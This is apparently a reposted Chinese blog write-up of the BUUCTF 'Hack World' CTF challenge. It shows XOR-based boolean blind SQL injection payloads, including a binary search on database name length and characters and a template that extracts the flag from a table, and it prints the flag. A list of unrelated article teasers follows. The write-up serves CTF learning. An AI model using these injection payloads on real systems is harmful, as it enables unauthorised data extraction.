buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

devtools/2024/9/19 16:56:34/ 标签: 数据库, php, web安全, sql

buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

1.根据提示,说明flag在表里
在这里插入图片描述

2.那就猜测存在sql注入,反手测试一波id=1'
在这里插入图片描述
3.尝试使用1'--+进行注释
在这里插入图片描述
4.直接丢进salmap里吧,不出意外多半是跑不出来
在这里插入图片描述
5.直接放入fuzz里进行测试
在这里插入图片描述
6.发现当我们使用异或时,出现了提示
Hello, glzjin wants a girlfriend.
在这里插入图片描述
7.那我们就按照这个思路进行注入
异或异或,相同为0,不同为1
在这里插入图片描述
在这里插入图片描述
8.判断数据库的长度

0^(length(database())>0)

在这里插入图片描述

0^(length(database())>16)

在这里插入图片描述
9.使用折半查找的方式进行测试
在这里插入图片描述

0^(length(database())>13)

在这里插入图片描述

0^(length(database())>10)

在这里插入图片描述

0^(length(database())>11)

在这里插入图片描述
10.说明数据库的长度为11

0^(length(database())=11)

在这里插入图片描述
12.判断数据库

0^(ascii(substr(database(),1,1))>80)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>100)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>90)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>95)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>97)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>98)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>99)

在这里插入图片描述

id=0^(ascii(substr(database(),1,1))=99)

在这里插入图片描述

中间的折磨了好久想爆破数据库的表名,走啦好多的弯路,可以直接出来的

0^(ascii(substr((select(flag)from(flag)),{},1))>{})

在这里插入图片描述

flag{bcc3af9d-a5ee-4395-a540-ffb516eaba15}

在这里插入图片描述


http://www.ppmy.cn/devtools/22196.html

相关文章

经典的目标检测算法有哪些?

经典的目标检测算法有哪些?

一、经典的目标检测算法有哪些? 目标检测算法根据其处理流程可以分为两大类:One-Stage(单阶段)算法和Two-Stage(两阶段)算法。以下是一些经典的目标检测算法: 单阶段算法: YOLO (You Only Loo…
阅读更多...
关于腾讯云ocr银行卡识别报错url_1.URL is not a constructor

关于腾讯云ocr银行卡识别报错url_1.URL is not a constructor

使用腾讯云进行ocr银行卡识别报错url_1.URL is not a constructor的问题各位怎么解决的能否留言告知一二 在线代码调试可以,但是js使用报错url_1.URL is not a constructor export function ocr(dataUrl){//dataUrl已转换为base64// Depends on tencentcloud-sdk-n…
阅读更多...
PINN物理信息网络 | 利用物理信息神经网络进行流体动力学建模

PINN物理信息网络 | 利用物理信息神经网络进行流体动力学建模

背景 物理信息神经网络(Physics-Informed Neural Networks,PINN)是一种结合了神经网络和物理方程的方法,用于建模和求解物理问题。传统的基于物理方程的数值方法在处理复杂的非线性偏微分方程时可能面临数值稳定性、高计算复杂度和网格依赖性等问题。而PINN作为一种数据驱…
阅读更多...
安全运营之通行字管理

安全运营之通行字管理

一、什么是通行字 安全管理所指的通行字指的是对用于身份验证的账号密码或口令的管理。在计算机系统、网络服务、数据库管理等领域,通行字(或称账号口令、密码)是用于验证用户身份的重要机制。通行字管理的核心目标是确保只有授权用户才能访…
阅读更多...
idea的macOS Apple Silicon (dmg)版本和macOS (dmg)版本有什么区别

idea的macOS Apple Silicon (dmg)版本和macOS (dmg)版本有什么区别

“macOS Apple Silicon (dmg)” 版本则是专门为使用 Apple Silicon 芯片的 Mac 设备而设计的版本。 区别通常在于目标硬件平台和优化程度: 目标硬件平台:macOS Apple Silicon 版本是专门为基于 Apple Silicon 芯片的 Mac 设备(例如 M1、M1 P…
阅读更多...
tfrecord文件介绍、读取、写入介绍

tfrecord文件介绍、读取、写入介绍

1、tfrecord文件格式介绍 tfrecord文件格式,是深度学习框架tensorflow专用的一种文件格式,其底层使用protobuf,TensorFlow(python)也提供了api用于读取和写入tfrecord,非常方便,而对于golang语言,目前没有成…
阅读更多...
Eureka服务注册与发现

Eureka服务注册与发现

Eureka服务注册与发现 概念原理Eureka的基本架构Eureka包含两个组件:Eureka Server和Eureka Client 三大角色目前工程情况 构建步骤step1:EurekaServer服务注册中心Module的建立step2:将已有的微服务注册进eureka服务中心actuator与注册微服务…
阅读更多...
人机交互系统文本分类 text classification环节源码(E-commerce)

人机交互系统文本分类 text classification环节源码(E-commerce)

我把pre-trained model 下载到了本地 效果如下(到时候把代码中的sequence 和labels换成自己的text和分类就行了。): 源码见链接: https://download.csdn.net/download/qqqweiweiqq/89211553
阅读更多...
blender Principled Hair BSDF

blender Principled Hair BSDF

三种模式: Direct Coloring 直接指定所需的RGB颜色值着色器会尝试近似所需的吸收系数来模拟该颜色Melanin Concentration 使用更加物理化的方式定义头发/毛发颜色通过指定黑色素(Melanin)的浓度和黑红色素(Pheomelanin/Eumelanin)的比例来确定颜色更符合头发/毛发中…
阅读更多...
面向表格数据的大模型推理

面向表格数据的大模型推理

现实世界中存在大量未利用的先验知识和未标记数据。而在医疗等高价值领域,获取足够标记数据训练机器学习模型尤其困难,这限制了传统监督学习算法的应用。尽管深度学习方法在其他领域取得了显著进展,但在表格数据分类上仍未能超越传统的机器学…
阅读更多...
vue 项目关于不同分辨率的电脑网页适配方案

vue 项目关于不同分辨率的电脑网页适配方案

流式布局:这是一种相对灵活的布局方式,页面的元素宽度使用相对宽度(例如百分比)来定义,而不是使用绝对宽度(例如像素)。这样,当浏览器窗口大小变化时,元素会自动调整大小…
阅读更多...
Error opening file a bytes-like object is required,not ‘NoneType‘

Error opening file a bytes-like object is required,not ‘NoneType‘

错误显示,打开的是一个无效路径的文件 查看json文件内容,索引的路径与json文件保存的路径不同 方法:使用python脚本统一修改json文件路径 import json import os import argparse import cv2 from tqdm import tqdm import numpy as np impo…
阅读更多...
react 遇到的问题1 ——( 数据更新视图没更新)已解决

react 遇到的问题1 ——( 数据更新视图没更新)已解决

问题: 使用react开发项目时,使用useState 定义数据,通过定义的set方法修改数据,视图没有更新 原因: 在 React 中使用 useState 定义数据时,useState 返回一个数组,包含当前状态和更新的函数。…
阅读更多...
Android 自定义view 中增加属性,初始化时读取

Android 自定义view 中增加属性,初始化时读取

因为自定义View 有正向和反向两个状态,所以需要在初始化时区分加载哪个layout 在Android中,要在自定义View中增加属性,你需要完成以下步骤: 在res/values/attrs.xml文件中定义属性。 在自定义View的构造函数中获取这些属性。 在…
阅读更多...
RabbitMQ延迟队列,死信队列(8)

RabbitMQ延迟队列,死信队列(8)

死信队列 概览 死信队列(Dead Letter Queue,DLQ)是 RabbitMQ 中的一种特殊队列,用于存储无法被消费者正常处理的消息。当消息被发送到普通队列时,如果满足一定的条件,比如消息过期、被拒绝、队列长度达到…
阅读更多...
上海鑫吉百数——让制造型食品企业焕发新生机!

上海鑫吉百数——让制造型食品企业焕发新生机!

随着全球化和互联网的普及,食品行业的竞争也日益激烈。数字化转型有助于企业打破地域限制,拓宽市场渠道,提升品牌影响力和竞争力。在信息化、网络化的时代背景下,数字化转型成为企业适应社会发展的必然选择。消费者对于食品的需求…
阅读更多...
<计算机网络自顶向下> Internet Protocol(未完成)

<计算机网络自顶向下> Internet Protocol(未完成)

互联网中的网络层 IP数据报格式 ver: 四个比特的版本号(IPV4 0100, IPV6 0110) headlen:head的长度(头部长度字段(IHL)指定了头部的长度,以32位字(4字节)为单位计算。这…
阅读更多...
SSH Key生成

SSH Key生成

天行健,君子以自强不息;地势坤,君子以厚德载物。 每个人都有惰性,但不断学习是好好生活的根本,共勉! 文章均为学习整理笔记,分享记录为主,如有错误请指正,共同学习进步。…
阅读更多...
绿色发展!暴雨推出全液冷机架服务器

绿色发展!暴雨推出全液冷机架服务器

4月26日,暴雨发布业内首个实现原生全液冷的通用机架服务器。基于在液冷技术和产业生态化上的深厚积累,暴雨本次在通用机架服务器液冷技术上实现重大突破,从原生全液冷、大解耦、高能效三方面发力,为液冷数据中心建设提速。 当前&a…
阅读更多...
Unity功能——开发中逻辑坐标和世界坐标是什么?

Unity功能——开发中逻辑坐标和世界坐标是什么?

声明:本文为个人笔记,用于学习研究使用非商用,内容为个人研究及综合整理所得,若有违规,请联系,违规必改。 Unity功能——逻辑坐标和世界坐标 文章目录 Unity功能——逻辑坐标和世界坐标一.开发环境二.问题描…
阅读更多...
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站